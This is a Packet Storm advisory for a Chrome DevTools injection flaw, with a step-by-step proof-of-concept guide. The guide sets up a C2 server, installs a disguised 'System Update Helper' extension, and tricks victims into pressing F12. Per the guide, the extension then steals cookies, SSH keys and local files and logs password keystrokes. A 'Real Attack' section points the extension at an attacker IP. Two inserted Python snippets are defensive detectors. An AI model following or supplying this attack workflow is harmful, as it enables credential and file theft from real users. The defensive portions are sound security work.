📄 Google Chrome 145.0.7632.117 DevTools Injection

26 Feb 2026 | Reported by indoushka | Type: packetstorm | Source: packetstorm.news

High-severity Chrome DevTools flaw before 145.0.7632.117 lets extensions inject scripts into privileged DevTools pages.

Code
=============================================================================================================================================
    | # Title     : Google Chrome 145.0.7632.117 High-Severity DevTools Injection Vulnerability                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.google.com                                                                                                      |
    =============================================================================================================================================
    
    [+] Summary    :  A high-severity vulnerability was identified in the DevTools component of Google Chrome versions prior to 145.0.7632.117.
                      The issue stems from an inappropriate implementation that allowed insufficient isolation between Chrome extensions and privileged DevTools pages.
                      If a user was convinced to install a malicious browser extension, the extension could exploit this flaw to inject arbitrary scripts or HTML into a privileged DevTools page.
                      This could potentially lead to exposure of sensitive information accessible within that privileged context.
                      The vulnerability does not allow remote exploitation without user interaction and does not directly result in sandbox escape or operating system compromise.
                      However, due to the privileged nature of DevTools pages, the impact was rated High by the Google security team.
    
    [+] POC   :  
    
    How does this scenario work? ===> https://youtu.be/oFLvPWdp4X4
    
    The malicious extension is installed.
    
    The extension opens a phishing.html page and prompts the user to open DevTools, claiming that the page has an error.
    
    When DevTools is opened, the malicious code (payload) is executed within the page context, allowing data theft or communication with the host.
    
    Ideas
    
    Add-on permissions: For this code to work, the add-on must request permissions such as "tabs", "devtools", and "<all_urls>" in its manifest.json file.
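
A defender-side check for two indicators this advisory gives, the fixed build 145.0.7632.117 and the permission combination above. This is an added example, not part of the original advisory or its repository. The sample manifests are constructed; besides the permissions the advisory lists, the check reads the `devtools_page` manifest key (how an extension declares a DevTools page) and `host_permissions` (where Manifest V3 places `<all_urls>`).

```python
import json

FIXED_BUILD = (145, 0, 7632, 117)           # first fixed version per the advisory
RISKY = {"tabs", "devtools", "<all_urls>"}  # permissions the advisory names


def chrome_is_vulnerable(version: str) -> bool:
    """True when a dotted Chrome version is older than the fixed build."""
    parts = tuple(int(p) for p in version.strip().split("."))
    return parts < FIXED_BUILD


def audit_manifest(manifest_text: str) -> dict:
    """Report which of the advisory's indicators an extension manifest shows."""
    m = json.loads(manifest_text)
    requested = set()
    # MV2 keeps host patterns in "permissions"; MV3 moves them to "host_permissions".
    for key in ("permissions", "optional_permissions", "host_permissions"):
        requested.update(p for p in m.get(key, []) if isinstance(p, str))
    # A DevTools page is declared with the "devtools_page" key, not a permission.
    has_devtools = "devtools_page" in m or "devtools" in requested
    broad_hosts = "<all_urls>" in requested
    return {
        "name": m.get("name", ""),
        "matched": sorted(requested & RISKY),
        "devtools_page": m.get("devtools_page"),
        "flag": has_devtools and broad_hosts and "tabs" in requested,
    }


# Constructed sample manifests (not taken from the advisory's repository).
SUSPECT = json.dumps({
    "manifest_version": 3, "name": "System Update Helper", "version": "1.0",
    "permissions": ["tabs", "cookies", "management"],
    "host_permissions": ["<all_urls>"],
    "devtools_page": "devtools.html",
})
BENIGN = json.dumps({
    "manifest_version": 3, "name": "Constructed Notes App", "version": "2.3",
    "permissions": ["storage"],
    "host_permissions": ["https://notes.example/*"],
})

if __name__ == "__main__":
    for ver in ("145.0.7632.116", "145.0.7632.117"):
        print(ver, "vulnerable" if chrome_is_vulnerable(ver) else "patched")
    for text in (SUSPECT, BENIGN):
        print(audit_manifest(text))
```

A flagged manifest is a lead for review rather than proof of malice, since legitimate developer tooling can request the same combination.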
    
    [+] Step 1: Server Setup (Attacker Side)
    
    1.1 Install Requirements  : pip install flask flask-cors
    
    1.2 Run the Server
    
    download : https://github.com/indoushka/chromium/ =====> cd chromium ========> python sever-C2.py
    
    Expected Output:
    
    C2 Server running on http://0.0.0.0:8080
    
    Dashboard: http://localhost:8080/dashboard
    
    [+] Step 2: Extension Installation (Victim Side)
    
    2.1 Prepare Extension Files
    
    Place all files in a single folder (e.g., chromium/extension/).
    
    2.2 Install the Extension in Chrome
    
        Open chrome://extensions.
    
        Enable Developer mode (toggle in the top right).
    
        Click Load unpacked.
    
        Select the folder containing the extension files.
    	
        Installation Confirmation: The extension should appear in the list named "System Update Helper".
    
    [+] Step 3: How the Exploit Works
    
    3.1 Automatic Data Collection (No Victim Interaction)
    
    Once the extension is installed, it automatically begins:
    
    Function               Timing               Result
    Cookie Theft           Upon installation    Cookies are sent to the server
    Extension Discovery    Upon installation    List of installed extensions is sent
    Page Tracking          During browsing      Every page the victim visits is logged
    Heartbeat              Every minute         Confirms the extension is still active
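
The one-minute heartbeat in the table above is a regular cadence that proxy or DNS logs can expose. The following is an added detection example, not code from the advisory or its repository: the log format, the request paths and the thresholds are assumptions, and the log lines are constructed around the advisory's example address.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median, pstdev

# Constructed proxy log: ISO timestamp, client IP, destination, path.
# The address is the advisory's example; the paths are placeholders.
SAMPLE_LOG = """\
2026-02-26T10:00:02 10.0.0.15 192.168.1.100:8080 /placeholder-heartbeat
2026-02-26T10:00:40 10.0.0.15 intranet.example:443 /wiki
2026-02-26T10:00:55 10.0.0.15 intranet.example:443 /wiki
2026-02-26T10:01:01 10.0.0.15 192.168.1.100:8080 /placeholder-heartbeat
2026-02-26T10:01:30 10.0.0.15 192.168.1.100:8080 /placeholder-page
2026-02-26T10:02:03 10.0.0.15 192.168.1.100:8080 /placeholder-heartbeat
2026-02-26T10:03:02 10.0.0.15 192.168.1.100:8080 /placeholder-heartbeat
2026-02-26T10:04:02 10.0.0.15 192.168.1.100:8080 /placeholder-heartbeat
2026-02-26T10:07:10 10.0.0.15 intranet.example:443 /wiki
2026-02-26T10:07:30 10.0.0.15 intranet.example:443 /wiki
truncated line
""".splitlines()


def find_beacons(lines, period=60.0, tolerance=5.0, min_hits=4):
    """Return {(client, dest, path): median_gap} for requests repeating every ~period s."""
    seen = defaultdict(list)
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue  # skip malformed or truncated lines
        try:
            stamp = datetime.fromisoformat(fields[0])
        except ValueError:
            continue
        seen[(fields[1], fields[2], fields[3])].append(stamp)
    beacons = {}
    for key, stamps in seen.items():
        if len(stamps) < min_hits:
            continue  # too few samples to call it periodic
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        # Regular cadence: median gap near the period, little spread around it.
        if abs(median(gaps) - period) <= tolerance and pstdev(gaps) <= tolerance:
            beacons[key] = median(gaps)
    return beacons


if __name__ == "__main__":
    for key, gap in find_beacons(SAMPLE_LOG).items():
        print("periodic traffic:", key, "median gap", gap, "s")
```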
    
    3.2 Exploiting Privileged Pages (Requires Victim Interaction)
    
    When the victim opens a privileged page such as chrome://settings or chrome://downloads:
    
        A red message appears requesting the user to open DevTools:
        Page Error - Press F12 to open Developer Tools and fix the issue
    
        If the victim presses F12, the exploit code executes.
    
        Automatic file theft begins:
    
            C:/Windows/System32/drivers/etc/hosts
    
            C:/Users/Public/Documents/passwords.txt
    
            SSH files and system keys.
    
    3.3 Keylogging
    
    When the victim types in any password field:
    
    Keylogger installed
    
    Key logged: a
    Key logged: b...
    
    Every keystroke is sent to the server immediately.
    
    [+] Step 4: Monitoring Stolen Data (Attacker Side)
    
    4.1 Open the Control Panel
    
    In the browser, open: http://localhost:8080/dashboard
    
    4.2 Reading the Data
    
    Section       What you see
    Pages         All pages visited by the victim
    Cookies       Stolen cookies (including tokens)
    Files         Files stolen from the victim's device
    Keys          Keystrokes (passwords)
    Extensions    Other installed extensions
    
    4.3 Saved Files
    
        collected.json: All data in JSON format.
    
        stored_*.txt: Stolen files.
    
        keystrokes.log: Keystroke log.
    
        passwords.txt: Extracted passwords.
    
    [+] Practical Usage Scenarios
    
    Scenario 1: Testing on a Single Device
    
    [Your Device] ← Acts as both attacker and victim
    
        Run the server: python sever-C2.py
    
        Install the extension on the same device.
    
        Open the dashboard: http://localhost:8080
    
        Browse normal sites and chrome://pages.
    
    [+] Scenario 2: Real Attack (Two Devices)
    
    Victim Device              Attacker Device
    Installs the extension     Runs the server on a real IP
    Opens chrome://settings    IP: 192.168.1.100:8080
    Presses F12                Opens the dashboard
    Files are stolen           Sees data instantly
    
    Minor Adjustment: Change the C2 address in background.js to the attacker's IP : const C2 = 'http://192.168.1.100:8080';  // The attacker's real IP
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
